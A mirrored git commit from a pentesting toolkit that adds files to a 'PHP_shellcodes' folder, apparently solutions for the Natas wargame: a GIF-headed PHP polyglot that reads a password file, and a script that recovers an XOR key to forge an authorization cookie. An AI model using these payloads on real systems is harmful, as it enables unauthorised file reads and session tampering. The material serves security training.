mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-05-03 23:34:54 -04:00
docs: Clean up resources for Hackoctoberfest 2019 (#41)
* Clean up resources for Hackoctoberfest 2019
* 👩🏾🦱 Add cloud hacking readme
This commit is contained in:
parent
746d808fc0
commit
9ed0254149
458 changed files with 9658 additions and 57 deletions
1667
Web_Hacking/PHP_shellcodes/phpprimer_v0.1.pdf
Normal file
1667
Web_Hacking/PHP_shellcodes/phpprimer_v0.1.pdf
Normal file
File diff suppressed because it is too large
Load diff
|
@ -0,0 +1,5 @@
|
|||
GIF89a
|
||||
<?php
|
||||
readfile('/etc/natas_webpass/natas14
|
||||
');
|
||||
?>
|
After Width: | Height: | Size: 58 B |
31
Web_Hacking/PHP_shellcodes/xor.php
Executable file
31
Web_Hacking/PHP_shellcodes/xor.php
Executable file
|
@ -0,0 +1,31 @@
|
|||
<?php
|
||||
$cookie = base64_decode('ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw');
|
||||
|
||||
function xor_encrypt($in){
|
||||
$text = $in;
|
||||
$key = json_encode(array( "showpassword"=>"no", "bgcolor"=>"#ffffff"));
|
||||
$outText = '';
|
||||
|
||||
for($i=0;$i<strlen($text);$i++) {
|
||||
$outText .= $text[$i] ^ $key[$i % strlen($key)];
|
||||
}
|
||||
return $outText;
|
||||
}
|
||||
|
||||
print xor_encrypt($cookie);
|
||||
|
||||
|
||||
function xor_encrypt_mod(){
|
||||
$text = json_encode(array( "showpassword"=>"yes", "bgcolor"=>"#ffffff"));
|
||||
$key = 'qw8J';
|
||||
$outText = '';
|
||||
|
||||
for($i=0;$i<strlen($text);$i++) {
|
||||
$outText .= $text[$i] ^ $key[$i % strlen($key)];
|
||||
}
|
||||
return $outText;
|
||||
}
|
||||
|
||||
print base64_encode(xor_encrypt_mod());
|
||||
?>
|
||||
|
Loading…
Add table
Add a link
Reference in a new issue